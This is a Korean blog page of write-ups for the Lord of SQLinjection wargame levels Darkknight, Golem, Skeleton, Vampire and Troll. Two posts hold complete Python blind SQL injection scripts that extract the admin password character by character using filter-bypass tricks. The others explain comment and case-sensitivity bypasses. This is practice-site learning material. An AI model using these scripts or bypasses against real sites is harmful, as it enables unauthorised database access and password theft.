LOS(los.rubiya.kr) Darkknight

 이번 문제도 Blind SQLi 문제 다만 필터링이 조금 더 생겼다. 기존에 풀던 스크립트에 영향을 주는건 싱글 쿼터(')를 못쓴다는건데 이는 간단하게 더블 쿼터(")로 대체할 수 있다. 그것 외에는 그냥 기존 스크립트 그대로 사용해도 된다.

...더보기
import urllib2
import requests

flag = ""
length = 0
i = 1

session = dict(PHPSESSID = "qt55vvaetoc7mrikuq8qjmopr5")
url = "https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php??pw="
while True:
    q = url + "1&no=1 || id like \"admin\"%26%26 length(pw) like "+str(i)+"%23"
    print 'TEST #',i
    print q
    r = requests.post(q, cookies=session)
    if 'Hello admin' in r.text:
        length = i
        break

    i = i + 1

print " PASSWORD LENGTH : ", length

for j in range(1, length +1):
    for i in range(48,123):
        q = url + "1&no=1 || id like \"admin\"%26%26mid(pw, "+str(j)+",1) like "+"\""+chr(i)+"\""+"%23"

        print 'TEST #', j, '-', i
        print q
        r = requests.post(q,cookies=session)

        if 'Hello admin' in r.text:
            flag += chr(i)
            print "FLAG : ",flag
            break

'Web Hacking > los.rubiya.kr' 카테고리의 다른 글

[Lord of SQLinjection] Giant  (0) 2019.08.26
[Lord of SQLinjection] Bugbear  (0) 2019.08.26
[Lord of SQLinjection] Golem  (0) 2019.08.26
[Lord of SQLinjection] Skeleton  (0) 2019.08.18
[Lord of SQLinjection] Vampire  (0) 2019.08.18

LOS(los.rubiya.kr) golem

 Blind SQLi 문제이고 몇가지 필터가 걸려있다. 해당 필터를 우회하면 되는데 or는 ||로 and는 %26%26(&&)로 =는 LIKE를 이용하면 되고 substr같은 경우 mid함수를 이용하면 된다. 기존에 썼던 Blind SQLi 스크립트를 그대로 가져와서 살짝 수정해주면 슥삭 풀린다.

...더보기
import urllib2
import requests

flag = ""
length = 0
i = 1

session = dict(PHPSESSID = "0cm1on9va40u9bbtmk9lrr5ghn")
url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw="
while True:
    q = url + "' || id like 'admin'%26%26 length(pw) like "+str(i)+"%23"
    print 'TEST #',i
    print q
    r = requests.post(q, cookies=session)
    if 'Hello admin' in r.text:
        length = i
        break

    i = i + 1

print " PASSWORD LENGTH : ", length

for j in range(1, length +1):
    for i in range(48,123):
        q = url + "'||id like 'admin'%26%26mid(pw, "+str(j)+",1) like "+"'"+chr(i)+"'"+"%23"

        print 'TEST #', j, '-', i
        print q
        r = requests.post(q,cookies=session)

        if 'Hello admin' in r.text:
            flag += chr(i)
            print "FLAG : ",flag
            break

'Web Hacking > los.rubiya.kr' 카테고리의 다른 글

[Lord of SQLinjection] Bugbear  (0) 2019.08.26
[Lord of SQLinjection] Darkknight  (0) 2019.08.26
[Lord of SQLinjection] Skeleton  (0) 2019.08.18
[Lord of SQLinjection] Vampire  (0) 2019.08.18
[Lord of SQLInjection] Troll  (0) 2019.08.18

LOS(los.eagle-jump.org) Skeleton
 조건을 참으로 맞춰주면 끝나는 문제입니다. 다만 뒤에 and 1=0이 있어서 조건을 참으로 맞추지 못하게 방해하고 있습니다. 일단 pw에 공백 혹은 이상한 값을 넣어줘서 앞에 조건문을 거짓으로 만들어주고 or id='admin'을 넣어줍니다. 그리고 무슨 값을 넣어도 and 1=0 때문에 계속 거짓이 뜨는데 그냥 주석(#, %23)을 넣어서 id='admin' 뒷부분을 날려줍니다. 

'Web Hacking > los.rubiya.kr' 카테고리의 다른 글

[Lord of SQLinjection] Darkknight  (0) 2019.08.26
[Lord of SQLinjection] Golem  (0) 2019.08.26
[Lord of SQLinjection] Vampire  (0) 2019.08.18
[Lord of SQLInjection] Troll  (0) 2019.08.18
[Lord of SQLInjection] Orge  (0) 2019.08.18

LOS(los.eagle-jump.org) Vampire
 이번 문제는 str_replace를 이용해서 admin값이 들어오면 없애버리는(?) 필터링을 걸어놨습니다. 처음엔 adminadmin을 입력해서 앞에 admin을 삭제시키고 뒤에 admin이 들어가나 했지만 둘다 필터링되었고 str_replace가 대/소문자 구분을 한다는 점과 select가 대/소문자 구분을 하지 않는 다는 점을 다시 한번 이용해서 풀었습니다.

'Web Hacking > los.rubiya.kr' 카테고리의 다른 글

[Lord of SQLinjection] Golem  (0) 2019.08.26
[Lord of SQLinjection] Skeleton  (0) 2019.08.18
[Lord of SQLInjection] Troll  (0) 2019.08.18
[Lord of SQLInjection] Orge  (0) 2019.08.18
[Lord of SQLInjection] Darkelf  (0) 2019.08.18

LOS(los.eagle-jump.org) Troll
 이번 문제는 id만 admin으로 맞추면 풀립니다. 그런데 ereg를 이용하여 admin문자를 필터링 하고 있습니다. 저 필터링을 우회하여 id부분에 admin을 넣어주면 됩니다. 저는 ereg가 대/소문자를 구분한다는 점과 select문이 대/소문자를 구분하지 않는 다는 점을 이용하여 id에 ADMIN을 넣어서 풀어줬습니다.

'Web Hacking > los.rubiya.kr' 카테고리의 다른 글

[Lord of SQLinjection] Skeleton  (0) 2019.08.18
[Lord of SQLinjection] Vampire  (0) 2019.08.18
[Lord of SQLInjection] Orge  (0) 2019.08.18
[Lord of SQLInjection] Darkelf  (0) 2019.08.18
[Lord of SQLInjection] Wolfman  (0) 2019.08.17

+ Recent posts